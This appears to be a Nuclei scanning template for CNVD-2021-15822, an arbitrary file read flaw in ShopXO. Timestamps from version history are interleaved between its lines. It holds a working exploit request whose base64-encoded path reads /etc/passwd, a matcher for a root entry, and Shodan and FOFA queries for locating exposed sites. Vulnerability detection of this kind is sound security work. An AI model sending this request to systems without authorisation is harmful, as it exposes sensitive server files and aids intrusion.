2021-06-04 03:01:01 +00:00
id : CNVD-2021-15822
info :
name : ShopXO Download File Read
author : pikpikcu
severity : high
2023-05-30 10:00:59 +00:00
description : |
ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
2022-04-22 10:38:41 +00:00
reference :
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
2022-05-12 14:18:36 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2022-05-12 14:18:36 +00:00
shodan-query : title:"ShopXO企业级B2C电商系统提供商"
fofa-query : app="ShopXO企业级B2C电商系统提供商"
2022-01-04 06:26:46 +00:00
tags : shopxo,lfi,cnvd,cnvd2021
2021-06-04 03:01:01 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-04 03:01:01 +00:00
- raw :
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-06-04 03:01:01 +00:00
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100e57dac96ae0d1f36edfe893b5ac5525e60fc88fea028433abee6b60f107eaac2022100e549b69ef2d7a7b4268b8552e4990a3e588b27df60f5ea99bef5c6b6042eefbf:922c64590222798bb761d5b6d8e72950